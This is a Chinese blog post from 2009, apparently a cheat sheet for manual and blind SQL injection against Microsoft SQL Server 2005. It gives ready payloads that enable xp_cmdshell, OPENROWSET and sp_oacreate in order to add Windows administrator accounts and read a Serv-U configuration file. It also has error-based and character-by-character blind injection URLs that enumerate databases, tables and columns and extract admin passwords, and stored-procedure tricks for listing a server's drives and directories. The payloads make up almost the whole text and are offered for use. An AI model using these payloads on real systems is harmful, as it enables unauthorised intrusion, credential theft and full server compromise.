MSSQL2005 手工盲注详解

MSSQL2005 手工盲注详解
2009-06-16 17:04

一.开启扩展

1.开启xp_cmdshell

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

关闭xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;--

dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
(添加xplog70.dll)

2.开启'OPENROWSET'
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--

查询分析器里执行select * from openrowset('microsoft.jet.oledb.4.0','
;database=c:/windows/system32/ias/ias.mdb',
'select shell("cmd.exe /c net user admin admin1234 /add")')来利用沙盘来添加个管理员

3.开启'sp_oacreate'
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;--

拷贝文件d:/windows/explorer.exe 至sethc.exe
declare @o int;exec sp_oacreate 'scripting.filesystemobject', @o out ;exec sp_oamethod @o, 'copyfile',null,'d:/windows/explorer.exe' ,'c:/sethc.exe';

在查询分析器里执行
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:/WINdows/system32/cmd.exe /c net user xcode xcode /add'
这段代码就是利用SP_OAcreate来添加一个xcode的系统用户 然后直接提升为管理员权限

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:/Serv-U6.3/ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
这段代码就可以把ServUDaemon.ini里的配置信息全部显示出来

二.有显错,暴。

and 0<(select count(*) from master.dbo.sysdatabases);--折半法得到数据库个数

and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);--依次提交 dbid = 2.3.4... 得到更多的数据库名

and 0<(select count(*) name from employ.dbo.sysobjects where xtype='U');--折半法得到表个数(假设暴出库名employ)

and 0<(select top 1 name from employ.dbo.sysobjects where xtype='U');--爆出一个表名

假设暴出表名为"employ_qj"则在上面语句上加条件 and name not in ('employ_qj' 以此一直加条件...

and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = 'u' and name = 'employ_qj'));--爆出一个列名

假设暴出字段名为"id"则在上面语句上加上条件 and name not is('id') 以此一直加条件....

或者

爆库语句
and (select top 1 isnull(cast([name] as nvarchar(500)),char(32))+char(124) from [master].[dbo].[sysdatabases] where dbid in (select top N dbid from [master].[dbo].[sysdatabases] order by dbid desc))=0--

爆表语句,somedb部份是所要列的数据库
and (select top 1 cast(name as varchar(200)) from (select top N name from somedb.sys.all_objects where type=char(85) order by name) t order by name desc)=0--

爆字段语句,爆表admin里user='admin'的密码段
And (Select Top 1 isNull(cast([password] as varchar(2000)),char(32))+char(124) From (Select Top N [password] From [somedb]..[admin] Where user='admin' Order by [password]) T Order by [password]Desc)=0--

三.无显错,盲注。

先说下SQL2005中的查询方法

select * from master.dbo.sysdatabases                --查询数据库

select * from NetBook.dbo.sysobjects where xtype='u'    --查询数据库NetBook里的表

select * from NetBook.dbo.syscolumns where id=object_id('book') --查询book表里的字段

判断权限:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(select IS_SRVROLEMEMBER('serveradmin'))
and 1=(select IS_SRVROLEMEMBER('setupadmin'))
and 1=(select IS_SRVROLEMEMBER('securityadmin'))
and 1=(select IS_SRVROLEMEMBER('diskadmin'))
and 1=(select IS_SRVROLEMEMBER('bulkadmin'))
and 1=(select IS_SRVROLEMEMBER('db_owner'))

盲注常规步骤:

判断库是否确实为MSSQL2005:
http://www.oldjun.com/oldjun.aspx?id=1 and substring((select @@version),22,4)='2005'

猜数据库名:

先猜dbid:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5)=1
根据dbid猜库名,先猜出长度:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=12)=1
再逐位猜:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and ascii(substring(name,1,1))>90)=1

猜表名(假设库名已经猜出为database):

可以尝试先看有没管理表:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where xtype='u' and name like '%admin%')=1

猜第一个,先长度:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and len(name)=9)=1
猜第一个表名,逐位猜:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))>90)=1
猜第二个表名(假设第一个为table1):
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u' and name not in ('table1')) and ascii(substring(name,1,1))>90)=1
...

猜字段(假设表名已经猜出为table):

猜第一个字段:
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id('database.dbo.table')) and ascii(substring(name,1,1))>90)=1
猜第二个(假设第一个为column1)
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database_db.dbo.syscolumns where id=object_id('database.dbo.table') and name not in ('column1')) and ascii(substring(name,1,1))>90)=1
...

猜数据(假设要猜的字段为name):

http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.table where name in (select top 1 name from database_db.dbo.table) and ascii(substring(name,1,1))>90)=1
...

四.其他一些语句(列目录)

1.查看驱动器

建表p(i为自动编号,a记录盘符类似"c:/",b记录可用字节,其它省略)
;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));--

;insert p exec xp_availablemedia;--列出所有驱动器并插入表p

and (select count(*) from p)>3;--折半法查出驱动器总数

and ascii(substring((select a from p where i=1),1,1))=67;--折半法查出驱动器名(注asc(c)=67)
上面一般用于无显错情况下使用-------以此类推,得到所有驱动器名

and (select a from p where i=1)>3;--报错得到第一个驱动器名
上面一般用于显错情况下使用-------以此类推,得到所有驱动器名

;drop table p;--删除表p


2.查看目录

;create table pa(m nvarchar(255),i nvarchar(255));--建表pa(m记录目录,i记录深度)/

;insert pa exec xp_dirtree 'e:';--列出驱动器e并插入表pa

and (select count(*) from pa where i>0)>-1;--折半法查出i深度

and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;--报错得到深度i=1的第一个目录名
上面一般用显错且目录名不为数字情况下使用-------(得到第二个目录把"top 0"换为"top 1",换深度只换i就行)以此类推,得到e盘的所有目录

and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--折半法查出深度i=1的第一个目录名的长度
and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--折半法查出深度i=1的第一个目录名的第一个字符长度
上面一般用无显错情况下使用-------(得到第二个目录把"top 0"换为"top 1",换深度只换i就行)以此类推,得到e盘的所有目录

;drop table pa;--删除表pa

经过上面的方法就可得到服务器所有目录(这里为连接用户有读取权限目录)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值